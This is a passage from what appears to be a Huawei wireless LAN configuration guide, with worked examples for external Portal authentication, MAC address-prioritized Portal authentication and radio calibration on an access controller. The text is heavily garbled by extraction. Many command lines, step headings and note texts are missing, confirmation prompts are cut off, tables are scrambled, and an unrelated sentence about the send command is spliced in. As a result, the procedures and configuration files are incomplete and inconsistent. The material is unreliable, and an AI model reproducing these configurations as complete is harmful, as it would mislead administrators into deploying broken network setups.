l Bound profile: SSID profile guest, security profile wlan-
security, and authentication profile p1
Name: employee
l Bound profile: SSID profile employee, security profile wlan-
security, and authentication profile p1
NOTE
l In this example, Switch_A is a Huawei modular switch, and Switch_B is a Huawei fixed switch.
l When a VLAN pool is used to provide service VLANs on a large network, many VLANs are usually
added to the VLAN pool, and interfaces of many devices need to be added to these VLANs. In this
situation, a lot of broadcast domains are created if you configure the direct forwarding mode. To
reduce the number of broadcast domains, set the data forwarding mode to tunnel forwarding.
l Configurations of RADIUS server parameters and Portal server parameters must be the same as the
configurations on the peer RADIUS server and Portal server. Configure the parameters as required.
l To ensure that the router and servers can communicate with each other, configure routes on the
RADIUS server and Portal server to the router.
1. Configure basic WLAN services so that the AC can communicate with upper-layer and
lower-layer devices and the AP can go online.
2. Configure RADIUS authentication parameters.
3. Configure a Portal server profile.
4. Configure a Portal access profile to manage access control parameters for Portal
authentication users.
5. Configure an authentication-free rule profile so that the AC allows packets to the DNS
server to pass through.
6. Configure an authentication profile to manage NAC configuration.
Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure networking
parameters.

# Configure access switch Switch_A. Add GE0/0/1 to GE0/0/5 to VLAN 100 (management
VLAN). Interfaces GE0/0/1 to GE0/0/4 have the same configuration. GE0/0/1 is used as an
example here.
[HUAWEI] sysname Switch_A
[Switch_A] vlan batch 100
[Switch_A] interface gigabitethernet 0/0/1
[Switch_A-GigabitEthernet0/0/1] port link-type trunk
[Switch_A-GigabitEthernet0/0/1] port trunk pvid vlan 100
[Switch_A-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[Switch_A-GigabitEthernet0/0/1] port-isolate enable
[Switch_A-GigabitEthernet0/0/1] quit
[Switch_A] interface gigabitethernet 0/0/5
# Configure aggregation switch Switch_B. Add GE1/0/1 to VLAN 100, GE1/0/2 to VLANs
101, 102, and 200, and GE1/0/3 to VLAN 201.
[HUAWEI] sysname Switch_B
[Switch_B] vlan batch 100 101 102 200 201
[Switch_B] interface gigabitethernet 1/0/1
[Switch_B-GigabitEthernet1/0/1] port link-type trunk
[Switch_B-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[Switch_B-GigabitEthernet1/0/1] quit
[Switch_B-GigabitEthernet1/0/2] port trunk allow-pass vlan 101 102 200
# Create VLANIF interfaces VLANIF 100 to VLANIF 102, VLANIF 200, and VLANIF 201
on Switch_B and configure their IP addresses. VLANIF 100 works as the gateway of APs.
VLANIF 101 and VLANIF 102 are gateways of STAs. Switch_B uses VLANIF 200 to
communicate with the AC and VLANIF 201 to communicate with the router.
[Switch_B] interface vlanif 100
[Switch_B-Vlanif100] ip address 10.23.100.1 24
[Switch_B-Vlanif100] quit
# On the AC, add GE1/0/1 connected to Switch_B to VLAN 101, VLAN 102, and VLAN
200.
[HUAWEI] sysname AC
[AC-Vlanif200] quit

[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 101 102 200

# Add GE2/0/0 on the router to VLAN 201 and configure an IP address for VLANIF 201 so
that the router can communicate with Switch_B.
# On the router, configure a route to Switch_B.

[Router] ip route-static 10.23.100.0 24 10.67.201.2
# Configure a default route on Switch_B with the outbound interface as the router's VLANIF
201.
[Switch_B] ip route-static 0.0.0.0 0.0.0.0 10.67.201.1
# Configure routes from the AC to APs with the next hop as Switch_B's VLANIF 200.
[AC] ip route-static 10.23.100.0 24 10.45.200.2
Step 2 Configure a DHCP server to assign IP addresses to APs and STAs.

# Configure Switch_B as a DHCP relay agent.
[Switch_B] dhcp enable
[Switch_B-Vlanif100] dhcp select relay
[Switch_B-Vlanif100] dhcp relay server-ip 10.67.201.1
# Configure the router as a DHCP server to assign IP addresses to APs and STAs.
NOTE
In this example, the AP and AC are on different network segments. To notify the AP of the AC's IP address
so that the AP can go online at Layer 3, configure Option 43 in the address pool used by the AP.
[Router] ip pool ap
[Router-ip-pool-ap] network 10.23.100.0 mask 24
[Router-ip-pool-ap] gateway-list 10.23.100.1
[Router-ip-pool-ap] option 43 sub-option 3 ascii 10.45.200.1
[Router-ip-pool-ap] quit
[Router] ip pool sta1
[Router-ip-pool-sta1] network 10.23.101.0 mask 24
[Router-ip-pool-sta1] gateway-list 10.23.101.1
[Router-ip-pool-sta1] dns-list 172.16.1.2
[Router-ip-pool-sta1] quit
[Router] ip pool sta2
[Router-ip-pool-sta2] network 10.23.102.0 mask 24
[Router-ip-pool-sta2] gateway-list 10.23.102.1
[Router-ip-pool-sta2] dns-list 172.16.1.2

[Router-ip-pool-sta2] quit
[Router-Vlanif201] dhcp select global
Step 3 Configure a VLAN pool for service VLANs.
# Create a VLAN pool, add VLAN 101 and VLAN 102 to the pool, and set the VLAN
assignment algorithm to hash in the VLAN pool.
NOTE
This example uses the VLAN assignment algorithm hash as an example. The default VLAN assignment
algorithm is hash. If the default setting is retained, you do not need to run the assignment hash command.
In this example, only VLAN 101 and VLAN 102 are added to the VLAN pool. You can add multiple VLANs
to a VLAN pool. Similar to adding VLAN 101 and VLAN 102 to a VLAN pool, you need to create
corresponding VLANIF interfaces and configure IP addresses on Switch_B, and configure interface address
pools on the router.
[AC] vlan pool sta-pool
[AC-vlan-pool-sta-pool] vlan 101 102
[AC-vlan-pool-sta-pool] assignment hash
[AC-vlan-pool-sta-pool] quit
Step 4 Configure the APs to go online.
# Create AP groups guest and employee.

[AC] wlan
[AC-wlan-view] ap-group name guest
[AC-wlan-ap-group-guest] quit
[AC-wlan-view] ap-group name employee
[AC-wlan-ap-group-employee] quit
[AC-wlan-ap-group-guest] regulatory-domain-profile domain1
e?[Y/N]:y
[AC-wlan-ap-group-employee] regulatory-domain-profile domain1
e?[Y/N]:y
[AC-wlan-view] quit

# Import the APs offline on the AC. Add APs deployed in the lobby to AP group guest and
APs in office areas to AP group employee. Configure names for the APs based on the APs'
deployment locations, so that you can know where the APs are deployed from their names.
For example, if the AP with MAC address 60de-4474-9640 is deployed in room 1 of the
second floor of the office building, name the AP office2-1.

NOTE
radio).
[AC] wlan
[AC-wlan-ap-0] ap-name lobby-1
[AC-wlan-ap-0] ap-group guest
[AC-wlan-ap-0] quit
[AC-wlan-ap-1] ap-name lobby-2
[AC-wlan-ap-1] ap-group guest
[AC-wlan-ap-1] quit
[AC-wlan-view] ap-id 2 ap-mac 60de-4474-9640
[AC-wlan-ap-2] ap-name office2-1
[AC-wlan-ap-2] ap-group employee
[AC-wlan-ap-2] quit
[AC-wlan-ap-3] ap-name office2-2
[AC-wlan-ap-3] ap-group employee
[AC-wlan-ap-3] quit
[AC-wlan-view] quit
# After an AP is powered on, run the display ap all command to check the AP state. If the
[AC] display ap all
nor : normal [4]
----------------------------------------------------------------------------------
------------
Uptime
----------------------------------------------------------------------------------
------------
0 60de-4474-9640 office2-1 employee 10.23.100.253 AP6010DN-AGN nor 0 2H:
30M:1S
1 60de-4474-9660 office2-2 employee 10.23.100.251 AP6010DN-AGN nor 0 2H:
35M:2S
2 60de-4476-e360 lobby-1 guest 10.23.100.254 AP6010DN-AGN nor 0 2H:
29M:29S
3 60de-4476-e380 lobby-2 guest 10.23.100.252 AP6010DN-AGN nor 0 2H:
34M:11S
----------------------------------------------------------------------------------
------------
Total: 4
Step 5 Configure a RADIUS server template, and a RADIUS authentication scheme.

# Configure a RADIUS server template.

[AC-radius-radius_huawei] radius-server shared-key cipher Huawei@123

# Configure a RADIUS authentication scheme.

[AC] aaa
# Create an AAA domain and configure the RADIUS server template and authentication
scheme.
[AC-aaa] quit
Step 6 Configure a Portal server profile.

[AC] web-auth-server abc
[AC-web-auth-server-abc] server-ip 172.16.1.1
[AC-web-auth-server-abc] shared-key cipher Admin@123
[AC-web-auth-server-abc] port 50200
[AC-web-auth-server-abc] url https://172.16.1.1:8443/webauth
[AC-web-auth-server-abc] quit
Step 7 Configure the Portal access profile portal1.

[AC-portal-access-profile-portal1] web-auth-server abc layer3
[AC-portal-access-profile-portal1] quit
Step 8 Configure an authentication-free rule profile.

[AC-free-rule-default_free_rule] free-rule 1 destination ip 172.16.1.2 mask 24
[AC-free-rule-default_free_rule] quit
Step 9 Configure the authentication profile p1.

[AC-authen-profile-p1] portal-access-profile portal1
[AC-authen-profile-p1] free-rule-template default_free_rule
[AC-authen-profile-p1] access-domain huawei.com portal force

# Create security profile wlan-security and set the security policy in the profile. By default,
the security policy is open system.
[AC] wlan
# Create SSID profiles guest and employee, and set the SSID names to guest and employee,
respectively.
[AC-wlan-view] ssid-profile name guest
[AC-wlan-ssid-prof-guest] ssid guest
[AC-wlan-ssid-prof-guest] quit
[AC-wlan-view] ssid-profile name employee
[AC-wlan-ssid-prof-employee] ssid employee
[AC-wlan-ssid-prof-employee] quit
# Create VAP profiles guest and employee, set the data forwarding mode and service
VLANs, and apply the security profiles and SSID profiles to the VAP profiles.

[AC-wlan-view] vap-profile name guest

[AC-wlan-vap-prof-guest] forward-mode tunnel
[AC-wlan-vap-prof-guest] service-vlan vlan-pool sta-pool
[AC-wlan-vap-prof-guest] security-profile wlan-security
[AC-wlan-vap-prof-guest] ssid-profile guest
[AC-wlan-vap-prof-guest] authentication-profile p1
[AC-wlan-vap-prof-guest] quit
[AC-wlan-view] vap-profile name employee
[AC-wlan-vap-prof-employee] forward-mode tunnel
[AC-wlan-vap-prof-employee] service-vlan vlan-pool sta-pool
[AC-wlan-vap-prof-employee] security-profile wlan-security
[AC-wlan-vap-prof-employee] ssid-profile employee
[AC-wlan-vap-prof-employee] authentication-profile p1
[AC-wlan-vap-prof-employee] quit
# Bind VAP profiles to the AP groups and apply the VAP profiles to radio 0 and radio 1 of the
APs.
[AC-wlan-ap-group-guest] vap-profile guest wlan 1 radio 0
[AC-wlan-ap-group-guest] vap-profile guest wlan 1 radio 1
[AC-wlan-ap-group-employee] vap-profile employee wlan 1 radio 0
[AC-wlan-ap-group-employee] vap-profile employee wlan 1 radio 1


l After the configuration is complete, the WLAN with the SSID guest is available for
STAs in the lobby and the WLAN with the SSID employee is available for STAs in
office areas.
l The STAs obtain IP addresses when they successfully associate with the WLAN.
l When a user opens the browser and attempts to access the network, the user is
automatically redirected to the authentication page provided by the external Portal server.
After entering the correct user name and password on the page, the user can access the
network.
----End
Configuration Files
l Configuration file of Switch_A
#
sysname Switch_A
#
vlan batch 100
#
#

#
#
#
#
return
l Configuration file of Switch_B
#
sysname Switch_B
#
vlan batch 100 to 102 200 201
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select relay
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select relay
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select relay
#
interface Vlanif200
ip address 10.45.200.2 255.255.255.0
#
interface Vlanif201
ip address 10.67.201.2 255.255.255.0
#
#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.67.201.1
#
return
l Configuration file of the router
#
sysname Router
#
vlan batch 201
#

dhcp enable
#
ip pool ap
network 10.23.100.0 mask 255.255.255.0
option 43 sub-option 3 ascii 10.45.200.1
#
ip pool sta1
network 10.23.101.0 mask 255.255.255.0
dns-list 172.16.1.2
#
ip pool sta2
network 10.23.102.0 mask 255.255.255.0
dns-list 172.16.1.2
#
interface Vlanif201
ip address 10.67.201.1 255.255.255.0
dhcp select global
#
#
ip route-static 10.23.100.0 255.255.255.0 10.67.201.2
ip route-static 10.23.101.0 255.255.255.0 10.67.201.2
ip route-static 10.23.102.0 255.255.255.0 10.67.201.2
#
return
#
sysname AC
#
vlan batch 101 to 102 200
#
access-domain huawei.com portal force
#
vlan pool sta-pool
vlan 101 to 102
#
radius-server template
radius_huawei
radius-server shared-key cipher %^%#Ug1l9V#SI(JTFp+*)J7<%CUQB(74-4vSIKO!x:NI

%^%#
radius-server authentication 172.16.1.1 1812 weight
80
#
free-rule-template name
default_free_rule
free-rule 1 destination ip 172.16.1.2 mask

255.255.255.0
#
web-auth-server
abc
server-ip
172.16.1.1
port
50200
shared-key cipher %^%#4~ZXE3]6@BXu;2;aw}hA{rSb,@"L@T#e{%6G1AiD%^

%#
url https://172.16.1.1:8443/
portal
#
portal-access-profile name
portal1
web-auth-server abc
layer3
#
aaa
authentication-scheme
radius_huawei
domain huawei.com
#
interface Vlanif200
ip address 10.45.200.1 255.255.255.0
#
#
ip route-static 10.23.100.0 255.255.255.0 10.45.200.2
#
#
wlan
ssid-profile name guest
ssid guest
ssid-profile name employee
ssid employee
vap-profile name guest
forward-mode tunnel
service-vlan vlan-pool sta-pool
ssid-profile guest
vap-profile name employee
forward-mode tunnel
service-vlan vlan-pool sta-pool
ssid-profile employee
ap-group name guest
radio 0
vap-profile guest wlan 1
radio 1
vap-profile guest wlan 1
ap-group name employee
radio 0
vap-profile employee wlan 1
radio 1
vap-profile employee wlan 1
ap-name lobby-1
ap-group guest
ap-name lobby-2
ap-group guest

ap-id 2 ap-mac 60de-4474-9640

ap-name office2-1
ap-group employee
ap-id 3 ap-mac 60de-4474-9660
ap-name office2-2
ap-group employee
#
return
16.8 Example for Configuring MAC Address-prioritized

Portal Authentication
MAC Address-Prioritized Portal Authentication
In MAC address-prioritized Portal authentication, when the Portal server needs to authenticate
a user, the access device first sends the user terminal's MAC address to the Portal server for
identity authentication. If the authentication fails, the Portal server pushes the Portal
authentication page to the terminal. The user then enters the user name and password for
authentication. The RADIUS server caches a terminal's MAC address during the first
authentication for the terminal. If the terminal is disconnected and then connected to the
network within the MAC address validity period, the RADIUS server searches for the MAC
address of the terminal in the cache to authenticate the terminal.
Configuration Notes
l In this example, MAC address authentication is used. To ensure network security,
configure an appropriate security policy according to your network requirements.


Configuration.

are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN

Users can run the send command to send messages to user interfaces. To meet service
requirements, the company needs to deploy an identity authentication system to implement
access control on all employees who attempt to connect to the company network. Only
authorized users can connect to the company network.
Because visitors move frequently, Portal authentication is configured and the RADIUS server
is used to authenticate user identities.
To facilitate network access, the company decides to configure MAC address-prioritized
Portal authentication. If a user goes offline after passing Portal authentication for the first
time, the user can go online again within a certain period (60 minutes for example) without
entering the user name and password again.
Figure 16-7 Networking for MAC address-prioritized portal authentication

RADIUS Server/Portal Server
192.168.2.30
Intranet
DNS Server
192.168.3.1
VLANIF101
192.168.2.1/24 GE1/0/2
STA GE0/0/1 VLAN101
……
Guest Area GE1/0/1

VLAN100
SwitchA AC
GE0/0/2
STA VLANIF100
Management VLAN:100 192.168.1.1/24
Service VLAN:101
Data Plan

Item Data
DHCP The AC functions as a DHCP server to assign IP addresses to the AP and

server STAs.
IP address 192.168.1.2 to 192.168.1.254/24

pool for
APs

Item Data
IP address 192.168.2.2 to 192.168.2.254/24

pool for
STAs
IP address VLANIF100: 192.168.1.1/24

of the AC's
source
interface
RADIUS Name of the RADIUS authentication scheme: abc

authenticati Name of a RADIUS server template: rd1
on
parameters l IP address: 192.168.2.30
Portal l Name: abc

server l IP address: 192.168.2.30
template
l Destination port number in the packets that the AC sends to the Portal
server: 50200
l Portal shared key: Huawei@123
Portal l Name: web1

access l Bound template: Portal server template abc
profile
MAC l Name: m1
access l User name and password for MAC address authentication: MAC
profile addresses without hyphens (-)
Authenticati l Name: default_free_rule

on-free rule l Authentication-free resource: DNS server with IP address 192.168.3.1
template
Authenticati l Name: p1
on profile l Referenced profiles: Portal access profile web1 and MAC access profile
m1
l Forcible authentication domain for users: huawei.com

l Referenced profiles: VAP profile wlan-vap and regulatory domain
profile domain1

profile


Item Data

profile l Security policy: open system authentication

l Referenced profiles: SSID profile wlan-ssid and security profile wlan-
security
1. Configure basic WLAN services so that the AC can communicate with upstream and
downstream network devices, and AP can go online.
3. Configure AAA on the AC to implement identity authentication on access users through
the RADIUS server. The configuration includes configuring a RADIUS server template,
an AAA scheme, and an authentication domain, and binding the RADIUS server
template and AAA scheme to the authentication domain.
4. Configure MAC address-prioritized Portal authentication. The configuration includes
configuring a Portal server template, a Portal access profile, a MAC access profile, an
authentication-free rule profile, and an authentication profile, and binding the
authentication profile to an interface.
5. Configure WLAN service parameters, and bind a security policy profile and an
authentication profile to a VAP profile to control access from STAs.
6. Configure the Agile Controller.
Procedure
AC so that the AP and AC can exchange CAPWAP packets.
# On SwitchA, add GE0/0/1 connected to the AP and GE0/0/2 connected to the AC to
management VLAN 100.
# Add GE1/0/1 of the AC connected to SwitchA to VLAN 100.

[HUAWEI] sysname AC


Step 2 Configure the AC to communicate with upper-layer network devices.

NOTE
Configure AC's upstream interfaces to transparently transmit service VLAN packets and communicate
with upstream network devices.
# Add GE1/0/2 of the AC connected to an upper-layer device to VLAN 101 (service VLAN).
Step 3 Configure the AC as a DHCP server to assign IP addresses to the AP and STAs.
VLANIF 101.
[AC-Vlanif100] quit
[AC-Vlanif101] quit
# Create an AP group to which the APs with the same configuration can be added.
[AC] wlan
e?[Y/N]:y
[AC-wlan-view] quit

# Import the AP offline on the AC and add the AP to AP group ap-group1. In this example,
the AP's MAC address is 60de-4476-e360. Configure a name for the AP based on the AP's
deployment location, so that you can know where the AP is located. For example, if the AP
with MAC address 60de-4476-e360 is deployed in area 1, name the AP area_1.

NOTE
In this example, the AP6010DN-AGN is used and has two radios: radio 0 and radio 1. Radio 0 of the
AP6010DN-AGN works on the 2.4 GHz frequency band and radio 1 works on the 5 GHz frequency band.
[AC] wlan
[AC-wlan-ap-0] quit
[AC-wlan-view] quit
[AC] display ap all
nor : normal [1]
----------------------------------------------------------------------------------
---
Uptime
----------------------------------------------------------------------------------
---
----------------------------------------------------------------------------------
---
Total: 1

[AC] radius-server template rd1
[AC-radius-rd1] radius-server authentication 192.168.2.30 1812
[AC-radius-rd1] radius-server shared-key cipher Huawei@2012
[AC-radius-rd1] quit
[AC] aaa
[AC-aaa] authentication-scheme abc
[AC-aaa-authen-abc] authentication-mode radius
[AC-aaa-authen-abc] quit
[AC-aaa-domain-huawei.com] authentication-scheme abc
[AC-aaa-domain-huawei.com] radius-server rd1
[AC-aaa] quit
# Check whether a user can pass RADIUS authentication. (The test user test and password
Huawei2012 have been configured on the RADIUS server.)
[AC] test-aaa test Huawei2012 radius-template rd1

Step 6 Configure MAC address-prioritized Portal authentication.

# Configure the Portal server template abc.
[AC] web-auth-server abc
[AC-web-auth-server-abc] server-ip 192.168.2.30
[AC-web-auth-server-abc] port 50200
[AC-web-auth-server-abc] url http://192.168.2.30:8080/webagent
[AC-web-auth-server-abc] shared-key cipher Huawei@123
[AC-web-auth-server-abc] quit
# Configure the Portal access profile web1.

[AC] portal-access-profile name web1
[AC-portal-acces-profile-web1] web-auth-server abc direct
[AC-portal-acces-profile-web1] quit
# Configure the MAC access profile m1.

NOTE
MAC address authentication.
[AC] mac-access-profile name m1
[AC-mac-access-profile-m1] quit
# Configure the authentication-free rule profile default_free_rule.

[AC-free-rule-default_free_rule] free-rule 1 destination ip 192.168.3.1 mask 32
[AC-free-rule-default_free_rule] quit
# Configure the authentication profile p1, bind the Portal access profile web1, MAC access
profile m1, and authentication-free rule profile default_free_rule to the authentication
profile, specify the domain huawei.com as the forcible authentication domain in the
authentication profile, set the user access mode to multi-authen, and set the maximum
[AC-authen-profile-p1] portal-access-profile web1
[AC-authen-profile-p1] mac-access-profile m1
[AC-authen-profile-p1] free-rule-template default_free_rule
[AC-authen-profile-p1] access-domain huawei.com force
[AC-authen-profile-p1] authentication mode multi-authen max-user 100

# Create the security profile wlan-security and set a security policy in the profile. By default,
the security policy is open system authentication in open mode.
[AC] wlan
# Create the SSID profile wlan-ssid and set the SSID name to wlan-net.
# Create the VAP profile wlan-vap, configure the data forwarding mode and service VLANs,
and bind the security profile, authentication profile, and SSID profile to the VAP profile.
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101


# Bind the VAP profiles to the AP group and apply the VAP profiles to radio 0 and radio 1 of
the APs.

For details on how to log in to the Agile Controller, add user accounts and switches to the
Agile Controller, and configure authorization results and authorization rules on the Agile
Controller, see 10.6.1 Example for Configuring Portal Authentication to Control Internal
User Access to the Enterprise Network (Authentication Point on Core Switch). The
configurations are not described here.
In addition to the preceding configurations, you need to enable MAC address-prioritized

Portal authentication on the Agile Controller. The procedure is as follows:
1. Choose System > Terminal Configuration > Global Parameters.
2. On the MAC Address-Prioritized Portal Authentication tab page, enable MAC
Address-Prioritized Portal Authentication, and set Validity Period of MAC Address
to 60.
3. Click OK.

Item Expected Result
User l A user can only access the Agile Controller server and DNS server
authenticatio before successful authentication.
n l The user authentication page is pushed to the user when the user
attempts to visit an Internet website. After the user enters the correct
user name and password, the requested web page is displayed.
l After the authentication succeeds, run the display access-user command
on the AC to view information about online users.

Item Expected Result
A user The authentication is completed automatically. The user connects to the

disconnects Internet directly without entering the user name and password.
from the
wireless
network and
reconnects
to the
network 5
minutes
later.
A user The user authentication page is pushed to the user when the user attempts to
disconnects visit an Internet website. After the user enters the correct user name and
from the password, the requested web page is displayed.
wireless
network and
reconnects
to the
network 65
minutes
later.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
return
#
sysname AC
#
vlan batch 100 101
#
#

radius-server shared-key cipher %^%#4*SO-2u,Q.\1C~%[eiB77N/^2wME;6t

%6U@qAJ9:%^%#
#
#
web-auth-server abc
server-ip 192.168.2.30
port 50200
shared-key cipher %^%#CR@WPM9Q30%]A}9]g4hUqe1u~4Fz}PlU)QPL;73#%^%#
#
#
aaa
domain huawei.com
radius-server rd1
#
interface Vlanif100
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.2.1 255.255.255.0
#
#
#
wlan
ssid wlan-net
forward-mode tunnel
radio 0
radio 1
ap-name area_1
ap-group ap-group1
#
#
return


16.9.1 Example for Configuring Radio Calibration
Radio Calibration Overview
Radio calibration can dynamically adjust channels and power of APs managed by the same
AC to ensure that the APs work at the optimal performance. On a WLAN, operating status of
APs is affected by the radio environment. For example, if adjacent APs managed by the same
AC work on overlapping channels or an AP has large power, signal interference occurs. In
this case, you can configure radio calibration on the AC.
Typical application scenarios of radio calibration are as follows:
l During AP deployment, configure radio calibration to enable APs to automatically select
the optimal channels.
l When new APs are added to a network or the network environment changes, configure
radio calibration so that APs can adjust channels and power at scheduled time to work at
optimal performance.
Configuration Notes
l When configuring radio calibration, set the channel mode and power mode of an AP that
needs radio calibration to auto.

Configuration.

are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN

As shown in Figure 16-8, a large number of APs are deployed in an office building. The APs
connect to the AC through Switch_A to provide wireless services for users.
It will be a heavy workload to manually configure radio parameters (such as the channel) for
the APs one by one. The enterprise IT department requires that the AC automatically allocate
channels to the APs based on radio environments to simplify network deployment.
Figure 16-8 Networking diagram for configuring radio calibration
STA
AP1
GE0/0/1
VLAN 100
GE0/0/2 GE0/0/4
STA
VLAN 100 VLAN 100
Internet
AP2 SwitchA AC
GE1/0/1 GE1/0/4
STA GE0/0/3
VLAN 100 VLAN 100 VLAN 101
AP3
STA
Management VLAN: VLAN 100


Item Data
DHCP The AC functions as the DHCP server to assign IP addresses to the APs and
server STAs.
IP address 10.23.100.2-10.23.100.254/24
pool for the
APs

Item Data
IP address 10.23.101.2-10.23.101.254/24
pool for the
STAs

of the AC's
source
interface

l Referenced profiles: VAP profile wlan-vap, regulatory domain profile
domain1, 5G radio profile radio5g, and 2G radio profile radio2g

profile



security
5G radio l Name: radio5g

profile l Referenced profiles: RRM profile wlan-net and air scan profile wlan-
airscan

profile l Referenced profiles: RRM profile wlan-net and air scan profile wlan-
airscan
RRM Name: wlan-net

profile
Air scan l Name: wlan-airscan

profile l Air scan channel set: all channels supported by the corresponding
country code of an AP
l Air scan interval: 80000 ms
l Air scan duration: 80 ms

1. Configure the APs, AC, and upper-layer devices to communicate with each other.
2. Configure the AC as a DHCP server to assign IP addresses to the APs and STAs.
3. Configure a VLAN pool for service VLANs.
4. Configure the APs to go online.
a. Create an AP group and add APs that require the same configuration to the group
for unified configuration.
used by the AC to communicate with the APs.
c. Configure the AP authentication mode and import the APs offline to allow the APs
to go online.
6. Configure radio calibration so that the AC can automatically allocate the optimal
working channels to the APs.
Procedure
# Add GE0/0/1 to GE0/0/3 on SwitchA to VLAN 100 (management VLAN).

[HUAWEI] sysname AC

NOTE




[AC] wlan
e?[Y/N]:y
[AC-wlan-view] quit

NOTE
radio).
[AC] wlan
[AC-wlan-ap-0] quit
[AC-wlan-ap-1] quit
nor : normal [2]
----------------------------------------------------------------------------------
-----
Uptime

----------------------------------------------------------------------------------
-----
0 60de-4476-e360 area_1 ap-group1 10.23.101.253 AP6010DN-AGN nor 0 5M:
2S
1 dcd2-fc04-b500 area_2 ap-group1 10.23.101.254 AP6010DN-AGN nor 0 5M:
4S
----------------------------------------------------------------------------------
-----
Total: 2

NOTE
mode to tunnel.
the AP.
Step 5 Configure radio calibration.

# Create the RRM profile wlan-net and enable automatic channel selection and automatic
transmit power selection in the RRM profile. By default, automatic channel selection and
automatic transmit power selection are enabled.
[AC-wlan-view] rrm-profile name wlan-net
[AC-wlan-rrm-prof-wlan-net] undo calibrate auto-channel-select disable
[AC-wlan-rrm-prof-wlan-net] undo calibrate auto-txpower-select disable
[AC-wlan-rrm-prof-wlan-net] quit
# Create the air scan profile wlan-airscan and configure the scan channel set, scan interval,
and scan duration. By default, an air scan channel set contains all channels supported by the
corresponding country code of an AP.
[AC-wlan-view] air-scan-profile name wlan-airscan
[AC-wlan-air-scan-prof-wlan-airscan] scan-channel-set country-channel

[AC-wlan-air-scan-prof-wlan-airscan] scan-period 80
[AC-wlan-air-scan-prof-wlan-airscan] scan-interval 80000
[AC-wlan-air-scan-prof-wlan-airscan] quit
# Create the 2G radio profile radio2g and bind the RRM profile wlan-net and air scan profile
wlan-airscan to the 2G radio profile.
[AC-wlan-view] radio-2g-profile name radio2g
[AC-wlan-radio-2g-prof-radio2g] rrm-profile wlan-net
[AC-wlan-radio-2g-prof-radio2g] air-scan-profile wlan-airscan
[AC-wlan-radio-2g-prof-radio2g] quit
# Create the 5G radio profile radio5g and bind the RRM profile wlan-net and air scan profile
wlan-airscan to the 5G radio profile.
[AC-wlan-radio-5g-prof-radio5g] rrm-profile wlan-net
[AC-wlan-radio-5g-prof-radio5g] air-scan-profile wlan-airscan
# Bind the 5G radio profile radio5g and 2G radio profile radio2g to the AP group ap-
group1.
[AC-wlan-ap-group-ap-group1] radio-5g-profile radio5g
# Set the radio calibration mode to manual and trigger radio calibration. By default, the radio
calibration mode is manual.
[AC-wlan-view] calibrate enable manual
[AC-wlan-view] calibrate manual startup


l Connect STAs to the WLAN with SSID wlan-net and enter the password a1234567.
Run the display station ssid wlan-net command on the AC. The command output
shows that the STAs are connected to the WLAN wlan-net.
------------------------------------------------------------------------------
----------
STA MAC AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN
IP address
------------------------------------------------------------------------------
----------
e019-1dc7-1e08 0 area_1 0/1 2.4G 11n 65/38 -29 101
10.23.101.253
b878-2eb4-2689 1 area_2 0/1 2.4G 11n 78/43 -33 101
10.23.101.254
------------------------------------------------------------------------------
----------
Total: 2 2.4G: 2 5G: 0
l # Run the display radio all command on the AC to check radio calibration results.
[AC-wlan-view] display radio all
CH/BW:Channel/Bandwidth
CE:Current EIRP (dBm)
ME:Max EIRP (dBm)
CU:Channel utilization
ST:Status

----------------------------------------------------------------------
AP ID Name RfID Band Type ST CH/BW CE/ME STA CU
----------------------------------------------------------------------
1 area_2 0 2.4G bgn on 1/20M 28/28 1 10%
1 area_2 1 5G an on 149/20M 29/29 0 15%
0 area_1 0 2.4G bgn on 6/20M 28/28 1 15%
0 area_1 1 5G an on 153/20M 29/29 0 49%
----------------------------------------------------------------------
Total:4
l # Radio calibration stops one hour after the radio calibration is manually triggered. The
following configuration steps are not provided in the configuration file. After that, you
can perform either of the following configurations:
– (Recommended) Set the radio calibration mode to scheduled. Configure the APs to
perform radio calibration in off-peak hours, for example, between 00:00 am and
06:00 am.
[AC-wlan-view] calibrate enable schedule time 03:00:00
Warning: Committing configuration may cause service interruption,
continue?[Y/N]:y
– Manually fix the working channels of APs: disable automatic channel selection and
automatic transmit power selection in the RRM profile. Manually trigger radio
calibration when new APs are added to the network.
[AC-wlan-view] rrm-profile name wlan-net
[AC-wlan-rrm-prof-wlan-net] calibrate auto-channel-select disable
[AC-wlan-rrm-prof-wlan-net] calibrate auto-txpower-select disable
[AC-wlan-rrm-prof-wlan-net] quit
[AC-wlan-view] calibrate enable manual
[AC-wlan-view] calibrate manual startup
Warning: Committing configuration may cause service interruption,
continue?[Y/N]:y
----End
Configuration Files
l Configuration file of the SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface gigabitethernet0/0/1
#
#
#
return

#
sysname AC
#


#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
#
#
#
#
wlan
calibrate enable schedule time 03:00:00
%# aes
ssid wlan-net
forward-mode tunnel
air-scan-profile name wlan-airscan
scan-period 80
scan-interval 80000
rrm-profile name wlan-net
radio-2g-profile name radio2g
rrm-profile wlan-net
air-scan-profile wlan-airscan
rrm-profile wlan-net
air-scan-profile wlan-airscan
radio 0
radio-2g-profile radio2g
radio 1
ap-name area_1
ap-group ap-group1
ap-name area_2
ap-group ap-group1
#
return

16.9.2 Example for Configuring Static Load Balancing
Session-based Static Load Balancing Overview

STA. In static load balancing, APs are manually added to a load balancing group. When a
STA wants to connect to an AP in the load balancing group, the AC determines whether to
